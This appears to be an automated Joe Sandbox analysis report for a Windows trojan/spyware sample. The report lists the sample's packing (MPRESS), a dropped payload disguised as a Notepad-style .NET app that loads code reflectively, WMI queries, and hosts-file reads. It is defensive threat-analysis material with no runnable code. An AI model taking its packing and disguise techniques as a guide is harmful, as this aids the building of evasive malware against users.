Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140060EF0	0_2_0000000140060EF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004AF20	0_2_000000014004AF20
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014003CF20	0_2_000000014003CF20
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140010F60	0_2_0000000140010F60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140046F70	0_2_0000000140046F70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014001BF80	0_2_000000014001BF80
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140044FB0	0_2_0000000140044FB0
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_003B944F	2_2_003B944F
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_003B9D5B	2_2_003B9D5B
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_00B4C534	2_2_00B4C534
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_00B4E975	2_2_00B4E975
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_00B4E978	2_2_00B4E978
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_028D0450	2_2_028D0450
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_04E9031C	2_2_04E9031C
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_04E9C087	2_2_04E9C087
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 2_2_04E9C098	2_2_04E9C098
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 14_2_006B944F	14_2_006B944F
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 14_2_006B9D5B	14_2_006B9D5B
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 14_2_02B4D448	14_2_02B4D448
Source: C:\Users\user\AppData\Roaming\325.exe	Code function: 14_2_02B4CB50	14_2_02B4CB50

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 00000001400A6D70 appears 354 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 0000000140086C40 appears 51 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 00000001400A4F28 appears 34 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 00000001400A9358 appears 45 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 0000000140035BF0 appears 107 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 0000000140035870 appears 77 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: String function: 00000001400C2598 appears 38 times

Source: kS2dqbsDwD.exe

Static PE information: invalid certificate

Source: kS2dqbsDwD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 325.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmp	Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe	Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe

Source: 325.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: kS2dqbsDwD.exe

Static PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/29@9/5

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,

0_2_0000000140036D50

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_00000001400624E0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,

0_2_00000001400C22C0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,

0_2_0000000140088BA0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

File created: C:\Users\user\AppData\Roaming\field

Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe

File created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: kS2dqbsDwD.exe	Virustotal: Detection: 20%
Source: kS2dqbsDwD.exe	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
Source: C:\Users\user\AppData\Roaming\325.exe	Process created: C:\Users\user\AppData\Roaming\325.exe {path}
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process created: C:\Users\user\AppData\Roaming\325.exe {path}	Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\325.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kS2dqbsDwD.exe

Static PE information: Image base 0x140000000 > 0x60000000

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Unpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

.NET source code contains potential unpacker

Show sources

Source: 325.exe.0.dr, uNotepad/Form1.cs	.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs	.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs	.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs	.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

0_2_0000000140060290

Source: initial sample

Static PE information: section where entry point is pointing to: .MPRESS2

Source: kS2dqbsDwD.exe	Static PE information: real checksum: 0x9a0ca should be: 0xa1dfe
Source: 325.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xf8b72

Source: kS2dqbsDwD.exe	Static PE information: section name: .MPRESS1
Source: kS2dqbsDwD.exe	Static PE information: section name: .MPRESS2

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CF80 push eax; iretd	0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CF80 push eax; iretd	0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CF80 push eax; iretd	0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CD08 pushad ; retf	0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CD08 pushad ; retf	0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CD08 pushad ; retf	0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095F2A3 push esi; retf 0000h	0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095F2A3 push esi; retf 0000h	0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095F2A3 push esi; retf 0000h	0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099BAD8 push esi; retn 0000h	0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099BAD8 push esi; retn 0000h	0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099BAD8 push esi; retn 0000h	0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099CACC push esp; ret	0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099CACC push esp; ret	0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099CACC push esp; ret	0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099D9FB push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099D9FB push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099D9FB push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DF01 push ds; iretd	0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DF01 push ds; iretd	0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DF01 push ds; iretd	0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00993723 pushfd ; ret	0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00993723 pushfd ; ret	0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00993723 pushfd ; ret	0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DA4B push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DA4B push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0099DA4B push edi; ret	0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00996762 push es; retn 0002h	0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00996762 push es; retn 0002h	0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_00996762 push es; retn 0002h	0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_3_0095CF80 push eax; iretd	0_3_0095CF81

Source: initial sample	Static PE information: section name: .MPRESS1 entropy: 7.99951858505
Source: initial sample	Static PE information: section name: .text entropy: 7.5685116349

Source: 325.exe.0.dr, uNotepad/Form_Main.cs	High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 325.exe.0.dr, uNotepad/MDSDDD.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 325.exe.0.dr, uNotepad/MainWindow.cs	High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 325.exe.0.dr, uNotepad/Form1.cs	High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs	High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 325.exe.0.dr, uNotepad/uNote.cs	High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 325.exe.0.dr, uNotepad/AramaFormu.cs	High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 325.exe.0.dr, uNotepad/CollectionOfElements.cs	High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 325.exe.0.dr, uNotepad/About.cs	High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 325.exe.0.dr, uNotepad/TextUtility.cs	High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs	High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs	High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs	High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs	High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.cs	High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs	High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs	High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs	High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.cs	High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs	High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs	High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs	High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs	High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs	High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs	High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.cs	High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs	High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.cs	High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.cs	High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs	High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.cs	High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs	High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.cs	High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.cs	High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.cs	High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.cs	High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.cs	High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

File created: C:\Users\user\AppData\Roaming\325.exe

Jump to dropped file

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	0_2_000000014008B0A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	0_2_00000001400881E0
